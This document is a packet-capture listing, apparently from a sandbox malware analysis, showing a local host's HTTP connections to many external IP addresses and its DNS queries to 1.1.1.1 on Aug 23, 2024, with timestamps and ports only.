Aug 23, 2024 18:44:01.813043118 CEST	80	63525	64.190.63.136	192.168.2.5
Aug 23, 2024 18:44:01.813533068 CEST	80	62684	64.225.91.73	192.168.2.5
Aug 23, 2024 18:44:01.813589096 CEST	62684	80	192.168.2.5	64.225.91.73
Aug 23, 2024 18:44:01.819889069 CEST	63521	80	192.168.2.5	154.85.183.50
Aug 23, 2024 18:44:01.819927931 CEST	63517	80	192.168.2.5	64.225.91.73
Aug 23, 2024 18:44:01.819982052 CEST	50844	80	192.168.2.5	103.150.11.230
Aug 23, 2024 18:44:01.820024967 CEST	50842	80	192.168.2.5	188.114.96.3
Aug 23, 2024 18:44:01.820056915 CEST	49720	80	192.168.2.5	208.91.196.145
Aug 23, 2024 18:44:01.820076942 CEST	59544	80	192.168.2.5	154.212.231.82
Aug 23, 2024 18:44:01.820130110 CEST	59540	80	192.168.2.5	91.195.240.19
Aug 23, 2024 18:44:01.820422888 CEST	59534	80	192.168.2.5	199.191.50.83
Aug 23, 2024 18:44:01.820553064 CEST	59537	80	192.168.2.5	208.100.26.245
Aug 23, 2024 18:44:01.820600033 CEST	59528	80	192.168.2.5	162.255.119.102
Aug 23, 2024 18:44:01.820727110 CEST	59529	80	192.168.2.5	3.64.163.50
Aug 23, 2024 18:44:01.820772886 CEST	59530	80	192.168.2.5	188.114.96.3
Aug 23, 2024 18:44:01.824990034 CEST	80	59540	91.195.240.19	192.168.2.5
Aug 23, 2024 18:44:01.825351000 CEST	80	63521	154.85.183.50	192.168.2.5
Aug 23, 2024 18:44:01.825406075 CEST	63521	80	192.168.2.5	154.85.183.50
Aug 23, 2024 18:44:01.827008963 CEST	80	63517	64.225.91.73	192.168.2.5
Aug 23, 2024 18:44:01.827049971 CEST	63517	80	192.168.2.5	64.225.91.73
Aug 23, 2024 18:44:01.827145100 CEST	80	50844	103.150.11.230	192.168.2.5
Aug 23, 2024 18:44:01.827177048 CEST	80	50842	188.114.96.3	192.168.2.5
Aug 23, 2024 18:44:01.827235937 CEST	50844	80	192.168.2.5	103.150.11.230
Aug 23, 2024 18:44:01.827372074 CEST	80	49720	208.91.196.145	192.168.2.5
Aug 23, 2024 18:44:01.827387094 CEST	80	59544	154.212.231.82	192.168.2.5
Aug 23, 2024 18:44:01.827399015 CEST	50842	80	192.168.2.5	188.114.96.3
Aug 23, 2024 18:44:01.827399969 CEST	49720	80	192.168.2.5	208.91.196.145
Aug 23, 2024 18:44:01.827408075 CEST	80	59534	199.191.50.83	192.168.2.5
Aug 23, 2024 18:44:01.827439070 CEST	59544	80	192.168.2.5	154.212.231.82
Aug 23, 2024 18:44:01.827480078 CEST	80	59537	208.100.26.245	192.168.2.5
Aug 23, 2024 18:44:01.827501059 CEST	59534	80	192.168.2.5	199.191.50.83
Aug 23, 2024 18:44:01.827521086 CEST	59537	80	192.168.2.5	208.100.26.245
Aug 23, 2024 18:44:01.829514980 CEST	80	59528	162.255.119.102	192.168.2.5
Aug 23, 2024 18:44:01.830791950 CEST	80	59529	3.64.163.50	192.168.2.5
Aug 23, 2024 18:44:01.830801964 CEST	80	59530	188.114.96.3	192.168.2.5
Aug 23, 2024 18:44:01.830842972 CEST	59529	80	192.168.2.5	3.64.163.50
Aug 23, 2024 18:44:01.832468033 CEST	59530	80	192.168.2.5	188.114.96.3
Aug 23, 2024 18:44:04.517985106 CEST	80	50849	13.248.169.48	192.168.2.5
Aug 23, 2024 18:44:04.518140078 CEST	50849	80	192.168.2.5	13.248.169.48
Aug 23, 2024 18:44:04.526457071 CEST	50849	80	192.168.2.5	13.248.169.48
Aug 23, 2024 18:44:04.531681061 CEST	80	50849	13.248.169.48	192.168.2.5
Aug 23, 2024 18:44:05.053016901 CEST	50850	80	192.168.2.5	64.225.91.73
Aug 23, 2024 18:44:05.057981014 CEST	80	50850	64.225.91.73	192.168.2.5
Aug 23, 2024 18:44:05.058054924 CEST	50850	80	192.168.2.5	64.225.91.73
Aug 23, 2024 18:44:05.059474945 CEST	50850	80	192.168.2.5	64.225.91.73
Aug 23, 2024 18:44:05.064284086 CEST	80	50850	64.225.91.73	192.168.2.5
Aug 23, 2024 18:44:05.163997889 CEST	50851	80	192.168.2.5	154.85.183.50
Aug 23, 2024 18:44:05.168983936 CEST	80	50851	154.85.183.50	192.168.2.5
Aug 23, 2024 18:44:05.169045925 CEST	50851	80	192.168.2.5	154.85.183.50
Aug 23, 2024 18:44:05.185667038 CEST	50851	80	192.168.2.5	154.85.183.50
Aug 23, 2024 18:44:05.186599016 CEST	50852	80	192.168.2.5	44.221.84.105
Aug 23, 2024 18:44:05.197112083 CEST	80	50851	154.85.183.50	192.168.2.5
Aug 23, 2024 18:44:05.197124958 CEST	80	50852	44.221.84.105	192.168.2.5
Aug 23, 2024 18:44:05.197187901 CEST	50852	80	192.168.2.5	44.221.84.105
Aug 23, 2024 18:44:05.200841904 CEST	50852	80	192.168.2.5	44.221.84.105
Aug 23, 2024 18:44:05.205629110 CEST	80	50852	44.221.84.105	192.168.2.5
Aug 23, 2024 18:44:05.362149000 CEST	50853	80	192.168.2.5	103.224.182.252
Aug 23, 2024 18:44:05.366991043 CEST	80	50853	103.224.182.252	192.168.2.5
Aug 23, 2024 18:44:05.367070913 CEST	50853	80	192.168.2.5	103.224.182.252
Aug 23, 2024 18:44:05.367219925 CEST	50853	80	192.168.2.5	103.224.182.252
Aug 23, 2024 18:44:05.372623920 CEST	80	50853	103.224.182.252	192.168.2.5
Aug 23, 2024 18:44:05.501043081 CEST	61321	80	192.168.2.5	103.224.212.210
Aug 23, 2024 18:44:05.505888939 CEST	80	61321	103.224.212.210	192.168.2.5
Aug 23, 2024 18:44:05.509143114 CEST	61321	80	192.168.2.5	103.224.212.210
Aug 23, 2024 18:44:05.509303093 CEST	61321	80	192.168.2.5	103.224.212.210
Aug 23, 2024 18:44:05.514872074 CEST	80	61321	103.224.212.210	192.168.2.5
Aug 23, 2024 18:44:05.642157078 CEST	80	50850	64.225.91.73	192.168.2.5
Aug 23, 2024 18:44:05.642374039 CEST	50850	80	192.168.2.5	64.225.91.73
Aug 23, 2024 18:44:05.672282934 CEST	80	50852	44.221.84.105	192.168.2.5
Aug 23, 2024 18:44:05.672350883 CEST	50852	80	192.168.2.5	44.221.84.105
Aug 23, 2024 18:44:05.672959089 CEST	80	50852	44.221.84.105	192.168.2.5
Aug 23, 2024 18:44:05.673065901 CEST	50852	80	192.168.2.5	44.221.84.105
Aug 23, 2024 18:44:05.674230099 CEST	50852	80	192.168.2.5	44.221.84.105
Aug 23, 2024 18:44:05.679160118 CEST	80	50852	44.221.84.105	192.168.2.5
Aug 23, 2024 18:44:06.015809059 CEST	80	50853	103.224.182.252	192.168.2.5
Aug 23, 2024 18:44:06.015913963 CEST	80	50853	103.224.182.252	192.168.2.5
Aug 23, 2024 18:44:06.016068935 CEST	50853	80	192.168.2.5	103.224.182.252
Aug 23, 2024 18:44:06.016278028 CEST	50853	80	192.168.2.5	103.224.182.252
Aug 23, 2024 18:44:06.021964073 CEST	80	50853	103.224.182.252	192.168.2.5
Aug 23, 2024 18:44:06.036072969 CEST	61322	80	192.168.2.5	15.197.240.20
Aug 23, 2024 18:44:06.041433096 CEST	80	61322	15.197.240.20	192.168.2.5
Aug 23, 2024 18:44:06.041501999 CEST	61322	80	192.168.2.5	15.197.240.20
Aug 23, 2024 18:44:06.041601896 CEST	61322	80	192.168.2.5	15.197.240.20
Aug 23, 2024 18:44:06.046423912 CEST	80	61322	15.197.240.20	192.168.2.5
Aug 23, 2024 18:44:06.065023899 CEST	80	50851	154.85.183.50	192.168.2.5
Aug 23, 2024 18:44:06.065128088 CEST	50851	80	192.168.2.5	154.85.183.50
Aug 23, 2024 18:44:06.066418886 CEST	50851	80	192.168.2.5	154.85.183.50
Aug 23, 2024 18:44:06.071190119 CEST	80	50851	154.85.183.50	192.168.2.5
Aug 23, 2024 18:44:06.121805906 CEST	80	61321	103.224.212.210	192.168.2.5
Aug 23, 2024 18:44:06.122014999 CEST	61321	80	192.168.2.5	103.224.212.210
Aug 23, 2024 18:44:06.122183084 CEST	61321	80	192.168.2.5	103.224.212.210
Aug 23, 2024 18:44:06.122365952 CEST	80	61321	103.224.212.210	192.168.2.5
Aug 23, 2024 18:44:06.123059988 CEST	61321	80	192.168.2.5	103.224.212.210
Aug 23, 2024 18:44:06.127017975 CEST	80	61321	103.224.212.210	192.168.2.5
Aug 23, 2024 18:44:06.356277943 CEST	61323	80	192.168.2.5	64.190.63.136
Aug 23, 2024 18:44:06.361144066 CEST	80	61323	64.190.63.136	192.168.2.5
Aug 23, 2024 18:44:06.361200094 CEST	61323	80	192.168.2.5	64.190.63.136
Aug 23, 2024 18:44:06.361743927 CEST	61323	80	192.168.2.5	64.190.63.136
Aug 23, 2024 18:44:06.366568089 CEST	80	61323	64.190.63.136	192.168.2.5
Aug 23, 2024 18:44:06.377409935 CEST	80	50851	154.85.183.50	192.168.2.5
Aug 23, 2024 18:44:06.377470016 CEST	50851	80	192.168.2.5	154.85.183.50
Aug 23, 2024 18:44:06.502259970 CEST	61324	80	192.168.2.5	199.59.243.226
Aug 23, 2024 18:44:06.507128000 CEST	80	61324	199.59.243.226	192.168.2.5
Aug 23, 2024 18:44:06.507201910 CEST	61324	80	192.168.2.5	199.59.243.226
Aug 23, 2024 18:44:06.507288933 CEST	61324	80	192.168.2.5	199.59.243.226
Aug 23, 2024 18:44:06.512180090 CEST	80	61324	199.59.243.226	192.168.2.5
Aug 23, 2024 18:44:06.962519884 CEST	80	61324	199.59.243.226	192.168.2.5
Aug 23, 2024 18:44:06.962538004 CEST	80	61324	199.59.243.226	192.168.2.5
Aug 23, 2024 18:44:06.962641954 CEST	80	61324	199.59.243.226	192.168.2.5
Aug 23, 2024 18:44:06.962654114 CEST	61324	80	192.168.2.5	199.59.243.226
Aug 23, 2024 18:44:06.962692022 CEST	61324	80	192.168.2.5	199.59.243.226
Aug 23, 2024 18:44:06.963459969 CEST	61324	80	192.168.2.5	199.59.243.226
Aug 23, 2024 18:44:06.963473082 CEST	61324	80	192.168.2.5	199.59.243.226
Aug 23, 2024 18:44:06.968283892 CEST	80	61324	199.59.243.226	192.168.2.5
Aug 23, 2024 18:44:06.968476057 CEST	61324	80	192.168.2.5	199.59.243.226
Aug 23, 2024 18:44:07.047667980 CEST	80	61323	64.190.63.136	192.168.2.5
Aug 23, 2024 18:44:07.047718048 CEST	80	61323	64.190.63.136	192.168.2.5
Aug 23, 2024 18:44:07.047724962 CEST	80	61323	64.190.63.136	192.168.2.5
Aug 23, 2024 18:44:07.047756910 CEST	80	61323	64.190.63.136	192.168.2.5
Aug 23, 2024 18:44:07.047765970 CEST	80	61323	64.190.63.136	192.168.2.5
Aug 23, 2024 18:44:07.047771931 CEST	80	61323	64.190.63.136	192.168.2.5
Aug 23, 2024 18:44:07.047777891 CEST	80	61323	64.190.63.136	192.168.2.5
Aug 23, 2024 18:44:07.047868967 CEST	61323	80	192.168.2.5	64.190.63.136
Aug 23, 2024 18:44:07.047911882 CEST	61323	80	192.168.2.5	64.190.63.136
Aug 23, 2024 18:44:07.048254013 CEST	80	61323	64.190.63.136	192.168.2.5
Aug 23, 2024 18:44:07.048265934 CEST	80	61323	64.190.63.136	192.168.2.5
Aug 23, 2024 18:44:07.048276901 CEST	80	61323	64.190.63.136	192.168.2.5
Aug 23, 2024 18:44:07.048296928 CEST	61323	80	192.168.2.5	64.190.63.136
Aug 23, 2024 18:44:07.048321009 CEST	61323	80	192.168.2.5	64.190.63.136
Aug 23, 2024 18:44:07.052856922 CEST	80	61323	64.190.63.136	192.168.2.5
Aug 23, 2024 18:44:07.052925110 CEST	61323	80	192.168.2.5	64.190.63.136
Aug 23, 2024 18:44:07.052964926 CEST	80	61323	64.190.63.136	192.168.2.5
Aug 23, 2024 18:44:07.053005934 CEST	61323	80	192.168.2.5	64.190.63.136
Aug 23, 2024 18:44:07.145934105 CEST	80	61323	64.190.63.136	192.168.2.5
Aug 23, 2024 18:44:07.145952940 CEST	80	61323	64.190.63.136	192.168.2.5
Aug 23, 2024 18:44:07.145965099 CEST	80	61323	64.190.63.136	192.168.2.5
Aug 23, 2024 18:44:07.145975113 CEST	80	61323	64.190.63.136	192.168.2.5
Aug 23, 2024 18:44:07.145987988 CEST	80	61323	64.190.63.136	192.168.2.5
Aug 23, 2024 18:44:07.145998955 CEST	80	61323	64.190.63.136	192.168.2.5
Aug 23, 2024 18:44:07.146012068 CEST	80	61323	64.190.63.136	192.168.2.5
Aug 23, 2024 18:44:07.146023035 CEST	80	61323	64.190.63.136	192.168.2.5
Aug 23, 2024 18:44:07.146028042 CEST	80	61323	64.190.63.136	192.168.2.5
Aug 23, 2024 18:44:07.146038055 CEST	80	61323	64.190.63.136	192.168.2.5
Aug 23, 2024 18:44:07.146049023 CEST	80	61323	64.190.63.136	192.168.2.5
Aug 23, 2024 18:44:07.146119118 CEST	61323	80	192.168.2.5	64.190.63.136
Aug 23, 2024 18:44:07.146265984 CEST	61323	80	192.168.2.5	64.190.63.136
Aug 23, 2024 18:44:07.146342993 CEST	61323	80	192.168.2.5	64.190.63.136
Aug 23, 2024 18:44:07.151134968 CEST	80	61323	64.190.63.136	192.168.2.5
Aug 23, 2024 18:44:16.499224901 CEST	80	61322	15.197.240.20	192.168.2.5
Aug 23, 2024 18:44:16.499387980 CEST	61322	80	192.168.2.5	15.197.240.20
Aug 23, 2024 18:44:16.499618053 CEST	61322	80	192.168.2.5	15.197.240.20
Aug 23, 2024 18:44:16.504777908 CEST	80	61322	15.197.240.20	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 23, 2024 18:42:11.828021049 CEST	49859	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:11.828984022 CEST	56991	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:11.829154968 CEST	57984	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:11.830239058 CEST	54476	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:11.831547022 CEST	61390	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:11.832987070 CEST	57120	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:11.834098101 CEST	58407	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:11.835414886 CEST	54049	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:11.836514950 CEST	61795	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:11.837829113 CEST	56407	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:11.839196920 CEST	53	57984	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:11.839317083 CEST	59027	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:11.841167927 CEST	54634	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:11.842808962 CEST	65061	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:11.844289064 CEST	63749	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:11.845829010 CEST	62862	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:11.847326994 CEST	49676	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:11.847367048 CEST	53	61390	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:11.848711014 CEST	53	56407	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:11.849841118 CEST	53	59027	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:11.850884914 CEST	53	54634	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:11.850944042 CEST	55516	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:11.853646994 CEST	63791	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:11.855118990 CEST	64692	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:11.859618902 CEST	59463	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:11.860313892 CEST	53	49676	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:11.861157894 CEST	56088	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:11.862687111 CEST	53	55516	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:11.862869978 CEST	53173	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:11.864342928 CEST	53	63791	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:11.865106106 CEST	54344	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:11.866760015 CEST	61090	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:11.868163109 CEST	56865	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:11.869771004 CEST	52492	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:11.869971991 CEST	53	54049	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:11.872014999 CEST	59299	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:11.873363018 CEST	49881	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:11.873773098 CEST	53	65061	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:11.875040054 CEST	65424	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:11.876755953 CEST	53	62862	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:11.877080917 CEST	52557	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:11.878567934 CEST	53	61090	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:11.878968954 CEST	53	63749	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:11.879993916 CEST	54406	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:11.880732059 CEST	53	56865	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:11.881793022 CEST	52804	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:11.883296967 CEST	52397	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:11.884567022 CEST	55257	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:11.885445118 CEST	64099	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:11.886639118 CEST	56136	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:11.887810946 CEST	53	52557	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:11.888458967 CEST	59305	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:11.889626980 CEST	63893	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:11.890876055 CEST	57697	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:11.892930984 CEST	61061	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:11.893137932 CEST	53	52804	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:11.894184113 CEST	52646	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:11.894608974 CEST	53	55257	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:11.895600080 CEST	53	53173	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:11.896409035 CEST	59183	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:11.897391081 CEST	53	54344	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:11.897569895 CEST	65254	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:11.899374962 CEST	50695	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:11.899945974 CEST	53	59305	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:11.900836945 CEST	53	57697	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:11.900922060 CEST	53	52492	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:11.901839972 CEST	53	63893	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:11.903932095 CEST	62378	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:11.905365944 CEST	51242	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:11.906212091 CEST	53	59183	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:11.906491995 CEST	50368	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:11.907279968 CEST	53	65424	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:11.909323931 CEST	57395	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:11.910033941 CEST	53	65254	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:11.913438082 CEST	57645	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:11.913675070 CEST	59317	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:11.913836002 CEST	59397	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:11.914041996 CEST	57303	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:11.914200068 CEST	63718	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:11.914495945 CEST	53	62378	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:11.914613008 CEST	53	50695	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:11.915180922 CEST	53	54406	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:11.915668964 CEST	53	51242	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:11.915915012 CEST	53	52397	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:11.916814089 CEST	53	50368	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:11.916928053 CEST	53	59463	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:11.916968107 CEST	50119	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:11.917525053 CEST	57216	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:11.917777061 CEST	53	64099	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:11.919367075 CEST	53808	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:11.919589996 CEST	53	56136	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:11.920367956 CEST	64220	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:11.920994997 CEST	53	57395	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:11.921528101 CEST	59290	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:11.923540115 CEST	53	59317	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:11.923773050 CEST	53	61061	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:11.925601959 CEST	53	57303	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:11.927850008 CEST	55616	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:11.928078890 CEST	56567	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:11.928476095 CEST	64293	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:11.928905010 CEST	58621	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:11.928981066 CEST	53	50119	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:11.930345058 CEST	60956	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:11.930599928 CEST	53	52646	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:11.930793047 CEST	53	57216	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:11.930876970 CEST	62383	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:11.931876898 CEST	53	59290	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:11.938250065 CEST	53	64293	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:11.942800045 CEST	53	62383	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:11.944919109 CEST	53	63718	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:11.955811977 CEST	53	64220	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:11.993994951 CEST	53	57120	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:12.017035961 CEST	53	64692	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:12.021975994 CEST	51382	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:12.021975994 CEST	63672	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:12.032502890 CEST	53	59299	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:12.033315897 CEST	53	51382	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:12.033518076 CEST	53	58407	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:12.034811974 CEST	50783	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:12.045186996 CEST	53	54476	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:12.051513910 CEST	53	50783	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:12.065231085 CEST	53	61795	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:12.077590942 CEST	53	59397	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:12.079509020 CEST	53	57645	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:12.088432074 CEST	53	49881	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:12.090133905 CEST	53	60956	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:12.099363089 CEST	53	55616	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:12.131146908 CEST	53	53808	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:12.162699938 CEST	50193	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:12.179500103 CEST	53	63672	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:12.182231903 CEST	64619	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:12.185600996 CEST	53	58621	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:12.199559927 CEST	53	56991	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:12.218218088 CEST	63298	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:12.246257067 CEST	63746	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:12.249078989 CEST	53	56567	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:12.265959978 CEST	56271	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:12.308962107 CEST	61504	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:12.323777914 CEST	49172	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:12.352338076 CEST	63441	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:12.363236904 CEST	53	50193	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:12.454693079 CEST	53	64619	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:12.473922014 CEST	53	56271	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:12.492079020 CEST	53	63298	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:12.525315046 CEST	53	63441	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:12.539124012 CEST	53	49172	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:12.610327959 CEST	53	61504	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:12.788075924 CEST	53	56088	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:12.788942099 CEST	56577	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:12.829868078 CEST	49859	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:12.834935904 CEST	53	63746	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:12.849508047 CEST	53	56577	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:12.860035896 CEST	51403	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:13.148118019 CEST	49939	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:13.335566044 CEST	53	51403	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:13.350532055 CEST	53	49939	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:13.831069946 CEST	49859	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:14.094731092 CEST	53	49859	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:14.094742060 CEST	53	49859	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:14.094750881 CEST	53	49859	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:14.809592962 CEST	56762	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:15.714337111 CEST	53	56762	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:25.754682064 CEST	49963	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:25.754816055 CEST	64217	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:25.755569935 CEST	62031	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:25.755990028 CEST	50591	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:25.757025957 CEST	56714	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:25.757201910 CEST	51714	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:25.758687019 CEST	54619	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:25.758827925 CEST	60675	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:25.759686947 CEST	52401	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:25.760108948 CEST	52804	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:25.761152029 CEST	58349	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:25.761385918 CEST	51032	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:25.762650013 CEST	57357	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:25.762810946 CEST	54596	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:25.764213085 CEST	50485	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:25.764225006 CEST	50187	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:25.765619040 CEST	61300	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:25.765702963 CEST	53	49963	1.1.1.1	192.168.2.5
